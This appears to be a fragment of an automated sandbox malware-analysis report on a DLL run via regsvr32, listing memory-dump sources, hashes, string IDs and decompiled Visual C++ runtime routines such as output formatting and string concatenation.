                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                                                                        • API String ID: 2123368286-1993839260
                                                                                        • Opcode ID: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                                        • Instruction ID: 19a34de06f4f25a15c822aae2b95ff87e4dec291f3645630fab9b4d6ba707880
                                                                                        • Opcode Fuzzy Hash: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                                        • Instruction Fuzzy Hash: 4AE11836A1CB86CAE7A09B18E84476EB3E1F784345F604525E6CD83BB8DB7ED444CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                                                                        • API String ID: 2123368286-1853640030
                                                                                        • Opcode ID: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                                        • Instruction ID: 612b8f3a1e511721bf558c20b5ecc37bcc5fe5373454d887446b2b671354ce2d
                                                                                        • Opcode Fuzzy Hash: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                                        • Instruction Fuzzy Hash: 2EE13A32A1DB86CAE7A09B59E8447AEB7E1F385344F604125E6CD43BB8DB7ED444CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 22%
                                                                                        			E000007FE7FEF9D3E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                                                        				signed int _t224;
                                                                                        				signed char _t229;
                                                                                        				void* _t260;
                                                                                        				intOrPtr _t268;
                                                                                        				signed int _t342;
                                                                                        				signed int _t343;
                                                                                        				signed long long _t346;
                                                                                        				intOrPtr* _t365;
                                                                                        				intOrPtr* _t370;
                                                                                        				signed long long _t400;
                                                                                        
                                                                                        				_t342 = __rax;
                                                                                        				_a80 = _a80 | 0x00000040;
                                                                                        				_a72 = 0xa;
                                                                                        				_a72 = 0xa;
                                                                                        				_a116 = 0x10;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				_a1220 = 7;
                                                                                        				_a1220 = 0x27;
                                                                                        				_a72 = 0x10;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                                                                        				_a84 = 0x30;
                                                                                        				_a86 = _a1220 + 0x51;
                                                                                        				_a92 = 2;
                                                                                        				_a72 = 8;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                                                                        				asm("bts eax, 0x9");
                                                                                        				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                                                                        				E000007FE7FEF9D31EA0( &_a1560);
                                                                                        				_a1304 = _t342;
                                                                                        				goto 0xf9d3e844;
                                                                                        				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                                                                        				E000007FE7FEF9D31EA0( &_a1560);
                                                                                        				_a1304 = _t342;
                                                                                        				goto 0xf9d3e844;
                                                                                        				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                                                                        				_t343 = E000007FE7FEF9D31E40( &_a1560);
                                                                                        				_a1304 = _t343;
                                                                                        				goto 0xf9d3e807;
                                                                                        				E000007FE7FEF9D31E40( &_a1560);
                                                                                        				_a1304 = _t343;
                                                                                        				goto 0xf9d3e844;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                                                                        				E000007FE7FEF9D31E40( &_a1560);
                                                                                        				_a1304 = _t343;
                                                                                        				goto 0xf9d3e844;
                                                                                        				E000007FE7FEF9D31E40( &_a1560);
                                                                                        				_a1304 = _t343;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                                                                        				if (_a1304 >= 0) goto 0xf9d3e87b;
                                                                                        				_a1312 =  ~_a1304;
                                                                                        				asm("bts eax, 0x8");
                                                                                        				goto 0xf9d3e88b;
                                                                                        				_t346 = _a1304;
                                                                                        				_a1312 = _t346;
                                                                                        				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                                                                        				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                                                                        				_a1312 = _a1312 & _t346;
                                                                                        				if (_a116 >= 0) goto 0xf9d3e8d1;
                                                                                        				_a116 = 1;
                                                                                        				goto 0xf9d3e8ee;
                                                                                        				_a80 = _a80 & 0xfffffff7;
                                                                                        				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                                                                        				_a116 = 0x200;
                                                                                        				if (_a1312 != 0) goto 0xf9d3e901;
                                                                                        				_a92 = 0;
                                                                                        				_a64 =  &_a687;
                                                                                        				_t224 = _a116;
                                                                                        				_a116 = _a116 - 1;
                                                                                        				if (_t224 > 0) goto 0xf9d3e92f;
                                                                                        				if (_a1312 == 0) goto 0xf9d3e9cc;
                                                                                        				_a1480 = _a72;
                                                                                        				_a1296 = _t224 / _a1480 + 0x30;
                                                                                        				_a1488 = _a72;
                                                                                        				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                                                                        				_t229 = _a1296 + _a1220;
                                                                                        				_a1296 = _t229;
                                                                                        				 *_a64 = _a1296 & 0x000000ff;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				goto 0xf9d3e90e;
                                                                                        				_a104 = _t229;
                                                                                        				_a64 = _a64 + 1;
                                                                                        				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                                                                        				if (_a104 == 0) goto 0xf9d3ea0b;
                                                                                        				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				 *_a64 = 0x30;
                                                                                        				_a104 = _a104 + 1;
                                                                                        				if (_a108 != 0) goto 0xf9d3ec7c;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                                                                        				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                                                                        				_a84 = 0x2d;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ea9d;
                                                                                        				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                                                                        				_a84 = 0x2b;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ea9d;
                                                                                        				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                                                                        				_a84 = 0x20;
                                                                                        				_a92 = 1;
                                                                                        				_a1320 = _a88 - _a104 - _a92;
                                                                                        				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                                                                        				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                        				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                                                        				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                                                                        				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                                                                        				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                                                        				if (_a76 != 0) goto 0xf9d3ec29;
                                                                                        				if (_a104 <= 0) goto 0xf9d3ec29;
                                                                                        				_t365 = _a64;
                                                                                        				_a1328 = _t365;
                                                                                        				_a1336 = _a104;
                                                                                        				_a1336 = _a1336 - 1;
                                                                                        				if (_a1336 <= 0) goto 0xf9d3ec27;
                                                                                        				_t260 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                                                                        				_a1496 = _t365;
                                                                                        				E000007FE7FEF9D26840(_t260,  &_a120);
                                                                                        				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
                                                                                        				if (_a1340 > 0) goto 0xf9d3ebe7;
                                                                                        				_a1200 = 0xffffffff;
                                                                                        				goto 0xf9d3ec27;
                                                                                        				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                                                        				_a1328 = _a1328 + _a1340;
                                                                                        				goto 0xf9d3eb61;
                                                                                        				goto 0xf9d3ec47;
                                                                                        				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                                                        				if (_a1200 < 0) goto 0xf9d3ec7c;
                                                                                        				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                                                                        				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                        				if (_a96 == 0) goto 0xf9d3ec9c;
                                                                                        				0xf9d25330();
                                                                                        				_a96 = 0;
                                                                                        				goto 0xf9d3da75;
                                                                                        				if (_a1216 == 0) goto 0xf9d3ecc2;
                                                                                        				if (_a1216 == 7) goto 0xf9d3ecc2;
                                                                                        				_a1504 = 0;
                                                                                        				goto 0xf9d3eccd;
                                                                                        				_a1504 = 1;
                                                                                        				_t268 = _a1504;
                                                                                        				_a1344 = _t268;
                                                                                        				if (_a1344 != 0) goto 0xf9d3ed13;
                                                                                        				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                        				_a32 = _t370;
                                                                                        				r9d = 0;
                                                                                        				r8d = 0x8f5;
                                                                                        				0xf9d2b3b0();
                                                                                        				if (_t268 != 1) goto 0xf9d3ed13;
                                                                                        				asm("int3");
                                                                                        				if (_a1344 != 0) goto 0xf9d3ed6f;
                                                                                        				0xf9d2ab30();
                                                                                        				 *_t370 = 0x16;
                                                                                        				_a32 = 0;
                                                                                        				r9d = 0x8f5;
                                                                                        				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        				_a1376 = 0xffffffff;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				goto 0xf9d3ed8e;
                                                                                        				_a1380 = _a1200;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        			}













                                                                                        0x7fef9d3e6c6
                                                                                        0x7fef9d3e6cd
                                                                                        0x7fef9d3e6d1
                                                                                        0x7fef9d3e6de
                                                                                        0x7fef9d3e6eb
                                                                                        0x7fef9d3e6f7
                                                                                        0x7fef9d3e6ff
                                                                                        0x7fef9d3e70c
                                                                                        0x7fef9d3e717
                                                                                        0x7fef9d3e72a
                                                                                        0x7fef9d3e731
                                                                                        0x7fef9d3e740
                                                                                        0x7fef9d3e745
                                                                                        0x7fef9d3e74f
                                                                                        0x7fef9d3e762
                                                                                        0x7fef9d3e768
                                                                                        0x7fef9d3e77b
                                                                                        0x7fef9d3e785
                                                                                        0x7fef9d3e78a
                                                                                        0x7fef9d3e792
                                                                                        0x7fef9d3e7a2
                                                                                        0x7fef9d3e7ac
                                                                                        0x7fef9d3e7b1
                                                                                        0x7fef9d3e7b9
                                                                                        0x7fef9d3e7c7
                                                                                        0x7fef9d3e7d2
                                                                                        0x7fef9d3e7e1
                                                                                        0x7fef9d3e7e5
                                                                                        0x7fef9d3e7ed
                                                                                        0x7fef9d3e7f7
                                                                                        0x7fef9d3e7ff
                                                                                        0x7fef9d3e807
                                                                                        0x7fef9d3e812
                                                                                        0x7fef9d3e81c
                                                                                        0x7fef9d3e823
                                                                                        0x7fef9d3e82b
                                                                                        0x7fef9d3e835
                                                                                        0x7fef9d3e83c
                                                                                        0x7fef9d3e84d
                                                                                        0x7fef9d3e858
                                                                                        0x7fef9d3e865
                                                                                        0x7fef9d3e871
                                                                                        0x7fef9d3e879
                                                                                        0x7fef9d3e87b
                                                                                        0x7fef9d3e883
                                                                                        0x7fef9d3e896
                                                                                        0x7fef9d3e8a3
                                                                                        0x7fef9d3e8b8
                                                                                        0x7fef9d3e8c5
                                                                                        0x7fef9d3e8c7
                                                                                        0x7fef9d3e8cf
                                                                                        0x7fef9d3e8d8
                                                                                        0x7fef9d3e8e4
                                                                                        0x7fef9d3e8e6
                                                                                        0x7fef9d3e8f7
                                                                                        0x7fef9d3e8f9
                                                                                        0x7fef9d3e909
                                                                                        0x7fef9d3e90e
                                                                                        0x7fef9d3e918
                                                                                        0x7fef9d3e91e
                                                                                        0x7fef9d3e929
                                                                                        0x7fef9d3e934
                                                                                        0x7fef9d3e957
                                                                                        0x7fef9d3e963
                                                                                        0x7fef9d3e990
                                                                                        0x7fef9d3e9a2
                                                                                        0x7fef9d3e9a4
                                                                                        0x7fef9d3e9b8
                                                                                        0x7fef9d3e9c2
                                                                                        0x7fef9d3e9c7
                                                                                        0x7fef9d3e9d9
                                                                                        0x7fef9d3e9e5
                                                                                        0x7fef9d3e9f5
                                                                                        0x7fef9d3e9fc
                                                                                        0x7fef9d3ea09
                                                                                        0x7fef9d3ea13
                                                                                        0x7fef9d3ea1d
                                                                                        0x7fef9d3ea26
                                                                                        0x7fef9d3ea2f
                                                                                        0x7fef9d3ea3e
                                                                                        0x7fef9d3ea4b
                                                                                        0x7fef9d3ea52
                                                                                        0x7fef9d3ea57
                                                                                        0x7fef9d3ea5f
                                                                                        0x7fef9d3ea6a
                                                                                        0x7fef9d3ea71
                                                                                        0x7fef9d3ea76
                                                                                        0x7fef9d3ea7e
                                                                                        0x7fef9d3ea89
                                                                                        0x7fef9d3ea90
                                                                                        0x7fef9d3ea95
                                                                                        0x7fef9d3eaad
                                                                                        0x7fef9d3eabd
                                                                                        0x7fef9d3eada
                                                                                        0x7fef9d3eaf8
                                                                                        0x7fef9d3eb06
                                                                                        0x7fef9d3eb11
                                                                                        0x7fef9d3eb2e
                                                                                        0x7fef9d3eb38
                                                                                        0x7fef9d3eb43
                                                                                        0x7fef9d3eb49
                                                                                        0x7fef9d3eb4e
                                                                                        0x7fef9d3eb5a
                                                                                        0x7fef9d3eb71
                                                                                        0x7fef9d3eb7a
                                                                                        0x7fef9d3eb85
                                                                                        0x7fef9d3eb8a
                                                                                        0x7fef9d3eb97
                                                                                        0x7fef9d3ebc9
                                                                                        0x7fef9d3ebd8
                                                                                        0x7fef9d3ebda
                                                                                        0x7fef9d3ebe5
                                                                                        0x7fef9d3ebff
                                                                                        0x7fef9d3ec1a
                                                                                        0x7fef9d3ec22
                                                                                        0x7fef9d3ec27
                                                                                        0x7fef9d3ec42
                                                                                        0x7fef9d3ec4f
                                                                                        0x7fef9d3ec5a
                                                                                        0x7fef9d3ec77
                                                                                        0x7fef9d3ec82
                                                                                        0x7fef9d3ec8e
                                                                                        0x7fef9d3ec93
                                                                                        0x7fef9d3ec9c
                                                                                        0x7fef9d3eca9
                                                                                        0x7fef9d3ecb3
                                                                                        0x7fef9d3ecb5
                                                                                        0x7fef9d3ecc0
                                                                                        0x7fef9d3ecc2
                                                                                        0x7fef9d3eccd
                                                                                        0x7fef9d3ecd4
                                                                                        0x7fef9d3ece3
                                                                                        0x7fef9d3ece5
                                                                                        0x7fef9d3ecec
                                                                                        0x7fef9d3ecf1
                                                                                        0x7fef9d3ecf4
                                                                                        0x7fef9d3ed06
                                                                                        0x7fef9d3ed0e
                                                                                        0x7fef9d3ed10
                                                                                        0x7fef9d3ed1b
                                                                                        0x7fef9d3ed1d
                                                                                        0x7fef9d3ed22
                                                                                        0x7fef9d3ed28
                                                                                        0x7fef9d3ed31
                                                                                        0x7fef9d3ed4c
                                                                                        0x7fef9d3ed51
                                                                                        0x7fef9d3ed61
                                                                                        0x7fef9d3ed6d
                                                                                        0x7fef9d3ed76
                                                                                        0x7fef9d3ed82
                                                                                        0x7fef9d3eda5

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: get_int64_arg
                                                                                        • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 1967237116-1983305044
                                                                                        • Opcode ID: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                                        • Instruction ID: 6542cf9ee6a066de1e86aade3174812d6b56db97d2698e01b13d8cfaf3a7b086
                                                                                        • Opcode Fuzzy Hash: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                                        • Instruction Fuzzy Hash: 20F1E872A0DAC58AE7B18B55E8417AFB7E0F784346F200125E6C987AE9EB7DD440CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                                                                        • API String ID: 2123368286-3477667311
                                                                                        • Opcode ID: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                                        • Instruction ID: b03569ffd57b7167c314fdf02ed50a447cb54ce8ebbf145893a20e686b3b9740
                                                                                        • Opcode Fuzzy Hash: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                                        • Instruction Fuzzy Hash: BFF13832A0DB8685EBE08B19E94476EA3E0F385795F604535D6DE83BA8DF7ED044CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                                                                        • API String ID: 2123368286-1420200500
                                                                                        • Opcode ID: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                                        • Instruction ID: c5de73825737ff17a6e05e0685af1bba33d69fc1e3bcf908defeea2cf04d7043
                                                                                        • Opcode Fuzzy Hash: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                                        • Instruction Fuzzy Hash: A9F15A32A0DB8A89FBA08B14E84576EA7E0F385395FA04535D6DD43BA8DF3ED044CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                                                                        • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2560055391-3497434347
                                                                                        • Opcode ID: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                                        • Instruction ID: 46d09667909aa5f7b215aa93bab53907018271778d835aa8b5e6ab3fef1b3364
                                                                                        • Opcode Fuzzy Hash: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                                        • Instruction Fuzzy Hash: 3BC12D72A0C7C686E7B19B64E8457BEB7E4F384785F604025DAC887AA9DB7DE540CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: __doserrno$_invalid_parameter
                                                                                        • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                                        • API String ID: 747159061-1442092225
                                                                                        • Opcode ID: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                                        • Instruction ID: caaad020489782614700f882d8602b34381ead5b625f1b09b5848be00580b1cf
                                                                                        • Opcode Fuzzy Hash: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                                        • Instruction Fuzzy Hash: 28617C72A1C646CAE7909B25EC4076E72E1F380765F604725E6ED47AF9DB7EE440CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                                                                        • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                                                                        • API String ID: 1778837556-2487400587
                                                                                        • Opcode ID: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                                        • Instruction ID: 47630d5eafba837dbe703c3de9865bf662ca48ff4c989782bbe983e1f30135bf
                                                                                        • Opcode Fuzzy Hash: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                                        • Instruction Fuzzy Hash: 7851C476608AC591E774DB18F8803EEB3E1F788394F604126EACD43AA9DB7ED154CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
